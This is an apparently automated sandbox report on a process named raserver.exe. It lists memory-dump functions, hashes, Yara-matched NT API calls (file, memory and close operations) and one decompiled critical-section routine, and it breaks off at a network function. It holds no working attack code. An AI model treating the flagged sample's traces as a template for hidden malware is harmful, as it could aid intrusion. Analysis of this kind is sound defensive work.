Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcb9dfdbf8ce8417c2a7186516b273349de0580a437a90e197e31b15dfcd34e9
Instruction ID: 1d1d5bebffee472a916b9c413e5365d4d40d212ddfde9ec343a201eab752233a
Opcode Fuzzy Hash: bcb9dfdbf8ce8417c2a7186516b273349de0580a437a90e197e31b15dfcd34e9
Instruction Fuzzy Hash: 79900261A0511802D1407199551C7064495A7D0241F51D411A0054554DC6998A9576E1

Uniqueness

Uniqueness Score: -1.00%

Function 0190A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5587b1c8f95e2338a4ca472f23c583227324ecdc82a43181c112c0e6bb823ba4
Instruction ID: a86ba050cdd76c0d7c24a1c1ee7584eed8df26ff772ccd7dc93e8278e7d8447d
Opcode Fuzzy Hash: 5587b1c8f95e2338a4ca472f23c583227324ecdc82a43181c112c0e6bb823ba4
Instruction Fuzzy Hash: 3390027560515842D50065995908A874485A7D0345F51D811A045459CDC69488A1B161

Uniqueness

Uniqueness Score: -1.00%

Function 01909770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2cf83a52fb48abfbbc49b33c8b22ae54f9e6f4f985186404661b0e2fddf416
Instruction ID: d3077ae3b4a06fe6b3660e50c1ee459690da2cc909c3ec7669afef25282d8835
Opcode Fuzzy Hash: 8e2cf83a52fb48abfbbc49b33c8b22ae54f9e6f4f985186404661b0e2fddf416
Instruction Fuzzy Hash: 3290026160515842D1006599550CA064485A7D0245F51D411A1094595DC6758891B171

Uniqueness

Uniqueness Score: -1.00%

Function 01909760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6677206bd096b82c86d68740f029bcf5290d80b6a5c716c5b459926763d7c815
Instruction ID: f96355b554c72573b36537c6855bd5fb8d559f98216f6bf951b01a6d21448639
Opcode Fuzzy Hash: 6677206bd096b82c86d68740f029bcf5290d80b6a5c716c5b459926763d7c815
Instruction Fuzzy Hash: 6390027160111803D1006199560C7074485A7D0241F51D811A0454558DD69688917161

Uniqueness

Uniqueness Score: -1.00%

Function 019096D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f236ab11f2b008c9e28223becf80694674e5258644cf0adecfc637b77b66442
Instruction ID: 84997abe615fb22bad20bf888a8494f463627e4d52c5b448f80e69965326b828
Opcode Fuzzy Hash: 3f236ab11f2b008c9e28223becf80694674e5258644cf0adecfc637b77b66442
Instruction Fuzzy Hash: DF90027160111C42D10061994508B464485A7E0341F51C416A0154654DC655C8917561

Uniqueness

Uniqueness Score: -1.00%

Function 01909610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c292923b0d60ce0b3d742a6aa2f2a083ac773029b28a13aebc271ce83dde569
Instruction ID: 13ecb35d89b984ac078ecd8f7eb1262c54e92efc85c54d8c822c270cf0592f80
Opcode Fuzzy Hash: 6c292923b0d60ce0b3d742a6aa2f2a083ac773029b28a13aebc271ce83dde569
Instruction Fuzzy Hash: 02900271A0511C02D150719945187464485A7D0341F51C411A0054654DC7958A9576E1

Uniqueness

Uniqueness Score: -1.00%

Function 01909650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f84ccd8247216f1e6b1fead5250b1834a7572a96a82ff42f833192aa4dfe72
Instruction ID: 0b52b714f6cab0dd96b7c43180b5b8c33483f3e91800187e9e7b071d4de47dcb
Opcode Fuzzy Hash: f9f84ccd8247216f1e6b1fead5250b1834a7572a96a82ff42f833192aa4dfe72
Instruction Fuzzy Hash: 1B90027160515C42D14071994508A464495A7D0345F51C411A0094694DD6658D95B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01909670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 3aa9f26176de5b64145ebefa3c955fbc23bbca68377d7ed7a3b4eceb51943b76
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0195FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0195FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0190CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01955720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01955720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0195fdda
0x0195fde2
0x0195fde5
0x0195fdec
0x0195fdfa
0x0195fdff
0x0195fe0a
0x0195fe0f
0x0195fe17
0x0195fe1e
0x0195fe19
0x0195fe19
0x0195fe19
0x0195fe20
0x0195fe21
0x0195fe22
0x0195fe25
0x0195fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0195FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0195FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0195FE2B

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c4973503b49fa55341c3adb98e4f05894180511722946614d9f73bb6b3d3c90d
Instruction ID: 8dd7a12a4e9c4bb340e84f662558c4ec51eae44f3293d7f3b3855be054d446c7
Opcode Fuzzy Hash: c4973503b49fa55341c3adb98e4f05894180511722946614d9f73bb6b3d3c90d
Instruction Fuzzy Hash: 83F0C232200201BFEB615A45DC42F63BF5AEB84B30F250314FA28662E1DA62B96097A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: raserver.exe PID: 7104 Parent PID: 3440 raserver.exeCOMMON

Executed Functions

Function 009281BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00923B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00923B97,007A002E,00000000,00000060,00000000,00000000), ref: 0092820D

Strings

.z`, xrefs: 009281FD, 00928208

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 35d0e04d51135159811be6a393b29513907f93852542ae45d805a0eabdef979c
Instruction ID: d52ecd9b92a44470af0694971ca63c0e3ce5bf0f98ef6c8d0c35d2b397fbfcb0
Opcode Fuzzy Hash: 35d0e04d51135159811be6a393b29513907f93852542ae45d805a0eabdef979c
Instruction Fuzzy Hash: E3F0C4B2201108AFCB08CF88DC94EEB37A9AF8C354F158648FA0D97240C630E815CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009281C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00923B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00923B97,007A002E,00000000,00000060,00000000,00000000), ref: 0092820D

Strings

.z`, xrefs: 009281FD, 00928208

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 732aaf313889ad50941a8a69bd7282b995b5f5be35c910b05fab928b554af86a
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: A5F0B6B2201108ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00928270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00923D52,5E972F59,FFFFFFFF,00923A11,?,?,00923D52,?,00923A11,FFFFFFFF,5E972F59,00923D52,?,00000000), ref: 009282B5

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 1c4df297d63e282294502e1658fc12f045d43f3a9cf49bbf9d419889def8fa44
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 14F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0092826A, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00923D52,5E972F59,FFFFFFFF,00923A11,?,?,00923D52,?,00923A11,FFFFFFFF,5E972F59,00923D52,?,00000000), ref: 009282B5

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 86bf7d8902c43609f6d8d41b27b36eae32eede445b013a3d2a9157bf0f28b4be
Instruction ID: b49b0ab2c56b1dac1eda3391ae9488830df792f12a066213df932c8b3be0a03a
Opcode Fuzzy Hash: 86bf7d8902c43609f6d8d41b27b36eae32eede445b013a3d2a9157bf0f28b4be
Instruction Fuzzy Hash: FAF01DB6114049ABCB04DF98D894CEBBBA9FF8C354B15878DFD5C97202C534EC558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009283A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00912D11,00002000,00003000,00000004), ref: 009283D9

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 67f859ffc45f7b14e9c660b68b1554cecfb1616bcc4c1dad6dc451e5602f0a25
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: A7F015B2200218ABCB14DF89DC81EAB77ADAF88750F118548FE0897281CA30F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009282F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00923D30,?,?,00923D30,00000000,FFFFFFFF), ref: 00928315

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 6eb0d74a8f1a54ca2024a4a096089dec15496db005b775b27cda7986f4aed6fa
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 7ED012752002146BD710EF98DC45F97775CEF44750F154455BA185B282C930F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 009282EC, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00923D30,?,?,00923D30,00000000,FFFFFFFF), ref: 00928315

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5e884d238d9d915457a81ce0c0a8b3dc3d0b411eb5cf50f491cea9da782711c6
Instruction ID: 6427e3450dbbad4aeebc816fc70e81b20cc38cecbbe275da8c6ef7caac8502c2
Opcode Fuzzy Hash: 5e884d238d9d915457a81ce0c0a8b3dc3d0b411eb5cf50f491cea9da782711c6
Instruction Fuzzy Hash: 82D02EAD00E2C04FDB10FBB478C10C77B40EEA02187286ACFE4A80BA83C924920993E1

Uniqueness

Uniqueness Score: -1.00%

Function 0092839B, Relevance: 1.5, APIs: 1, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00912D11,00002000,00003000,00000004), ref: 009283D9

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
Instruction ID: ae1565dbe636e89eb8492bc552dfab35dba499b410d63e42320bfb28fadab535
Opcode Fuzzy Hash: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
Instruction Fuzzy Hash: 9ED0A7B21491446BC718CFD5BCC0CB3B7ECDFD8620704858EF9494600AC430A4148F70

Uniqueness

Uniqueness Score: -1.00%

Function 04C195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C195DA

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bb5f7e7ac6f3c56cef8326af51e080f818418beaa8993043aaf41bf8e6a3da2
Instruction ID: 9954be1cb64b15c00d93a025bfd02b1d582e11064bacdcb07f61ee0f3204f9b3
Opcode Fuzzy Hash: 9bb5f7e7ac6f3c56cef8326af51e080f818418beaa8993043aaf41bf8e6a3da2
Instruction Fuzzy Hash: 759002E120201103610571594514616410B97F0255B71C021E5015590DC5A5D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 04C19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1954A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea6723afa3499c29e5b9e18060a1027381acb9198070ec95bd4f6c42df9ed35c
Instruction ID: 1fdd18b91c474b2b749a4629ce8410b2c7bf39e4b157c073c6f20362f4a3dd0c
Opcode Fuzzy Hash: ea6723afa3499c29e5b9e18060a1027381acb9198070ec95bd4f6c42df9ed35c
Instruction Fuzzy Hash: 4A9002A5211011032105A5590704507014797E53A5371C021F5016550CD6A1D8616161

Uniqueness

Uniqueness Score: -1.00%

Function 04C196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C196DA

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66f2560e36598cfb9331ed0639d66fcaf251878e66052499df9fac2423be0dc9
Instruction ID: 3b74b5f1c9cf916f0ce63a3effcabd3c7e2a5ce6b5bc6100e0912ec555184301
Opcode Fuzzy Hash: 66f2560e36598cfb9331ed0639d66fcaf251878e66052499df9fac2423be0dc9
Instruction Fuzzy Hash: 4C9002B120101942F10061594504B46010697F0355F71C016A4125654D8695D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 04C196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C196EA

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 077efd6d3467a3e097362966b4cc7b592f7a27a66ec503eafe73d256714eb792
Instruction ID: 701442eadcfa83d1cf9b4bb958943fd5b2784df109a5f69417ba740e46cbec5e
Opcode Fuzzy Hash: 077efd6d3467a3e097362966b4cc7b592f7a27a66ec503eafe73d256714eb792
Instruction Fuzzy Hash: 689002B120109902F1106159850474A010697E0355F75C411A8425658D86D5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 04C19650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1965A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: faecda70aa797b8b8e5e7b20ae2e846c148446160b1a4e5ffe77110686e61d43
Instruction ID: efee3147930db38a9accaee9ef0aca1988dba1033e5d4e29b09faf6ad7d2ddbf
Opcode Fuzzy Hash: faecda70aa797b8b8e5e7b20ae2e846c148446160b1a4e5ffe77110686e61d43
Instruction Fuzzy Hash: 409002B120505942F14071594504A46011697E0359F71C011A4065694D96A5DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04C19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1966A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 335075c3154b005b24095cc7d382e4e422d828736dedcfaf6e997c58020929a8
Instruction ID: ecccaed2e7f8cccc69367f0254c6e39d1419ff9057acd2cf8553aad031f09bed
Opcode Fuzzy Hash: 335075c3154b005b24095cc7d382e4e422d828736dedcfaf6e997c58020929a8
Instruction Fuzzy Hash: 839002B120101902F1807159450464A010697E1355FB1C015A4026654DCA95DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04C19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C19FEA

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96078b8577fbde659a930de3ef50ba4ce7eb10184e8c9c26708a96e67d637cf2
Instruction ID: ce6e816662c464a4e08dae82953394f97a6aef6598b4f1f6685a2cea39d5f989
Opcode Fuzzy Hash: 96078b8577fbde659a930de3ef50ba4ce7eb10184e8c9c26708a96e67d637cf2
Instruction Fuzzy Hash: 989002B131115502F11061598504706010697E1255F71C411A4825558D86D5D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04C19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1978A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07c974e6d57c21b6c47250f568e99efaba1af72c26a331f41cbf955e61fb1da4
Instruction ID: c681c6fe7831f9ff73448fd2a0f03bdfc874df91ad1b164c8617348d67caf7de
Opcode Fuzzy Hash: 07c974e6d57c21b6c47250f568e99efaba1af72c26a331f41cbf955e61fb1da4
Instruction Fuzzy Hash: C79002A921301102F1807159550860A010697E1256FB1D415A4016558CC995D8696361

Uniqueness

Uniqueness Score: -1.00%

Function 04C19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1971A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cb57f405c12e83ba77aa527897bdbee098bbdd3f7c565c424644fb8f2f024fe
Instruction ID: 659aa484592843ff16e5c035849936a9b28211daf7a565300c430996493ec2c8
Opcode Fuzzy Hash: 1cb57f405c12e83ba77aa527897bdbee098bbdd3f7c565c424644fb8f2f024fe
Instruction Fuzzy Hash: 869002B120101502F10065995508646010697F0355F71D011A9025555EC6E5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 04C19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1984A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed6ddd2dd920ad27a75936331ca1d03a0af649c327bb55a13c04fb0dd3d78ec0
Instruction ID: bfb4da7082f06cb64454010c1de57adca649a45cbee12f88d7fc46ee8110b31b
Opcode Fuzzy Hash: ed6ddd2dd920ad27a75936331ca1d03a0af649c327bb55a13c04fb0dd3d78ec0
Instruction Fuzzy Hash: FB9002A1242052527545B15945045074107A7F02957B1C012A5415950C85A6E856E661

Uniqueness

Uniqueness Score: -1.00%

Function 04C19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1986A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c60badcf6d9745a69d0ce65382fa1d5a92500f84c225893b48d7265d1c8d1eab
Instruction ID: a4aade1d085a98bc4ae455bac2b5208d7475b9df4200a7a4f1b89e83cc0aac62
Opcode Fuzzy Hash: c60badcf6d9745a69d0ce65382fa1d5a92500f84c225893b48d7265d1c8d1eab
Instruction Fuzzy Hash: 639002B120101513F11161594604707010A97E0295FB1C412A4425558D96D6D952B161

Uniqueness

Uniqueness Score: -1.00%

Function 04C199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C199AA

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 983522404061358c4b97509174304249f8691a09e501f2a8b957d238d387b9ae
Instruction ID: 3456589de1516086459fb6b0a4e4593e5b92e0aa17ca2a4e935d7758180b9160
Opcode Fuzzy Hash: 983522404061358c4b97509174304249f8691a09e501f2a8b957d238d387b9ae
Instruction Fuzzy Hash: F99002E134101542F10061594514B060106D7F1355F71C015E5065554D8699DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04C19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C1991A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac427354adc392a2be2193e18d8a8a511b637a49d091ecf0b4e57581b6259717
Instruction ID: cd996c977625ff5a84a5d5916e500412ed70f1200aa0a02cf305072685d66c2b
Opcode Fuzzy Hash: ac427354adc392a2be2193e18d8a8a511b637a49d091ecf0b4e57581b6259717
Instruction Fuzzy Hash: F99002F120101502F14071594504746010697E0355F71C011A9065554E86D9DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04C19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C19A5A

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41a7dd178c021a882741f7c8c6bd73db6fd7f4b00a966aa13d451bae193f0cf4
Instruction ID: ec4a7960e6300a0b8ccadaa62b4ea3169e8dbdff600dec097eb633cc20a42626
Opcode Fuzzy Hash: 41a7dd178c021a882741f7c8c6bd73db6fd7f4b00a966aa13d451bae193f0cf4
Instruction Fuzzy Hash: 7A9002A121181142F20065694D14B07010697E0357F71C115A4155554CC995D8616561

Uniqueness

Uniqueness Score: -1.00%

Function 009288D0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

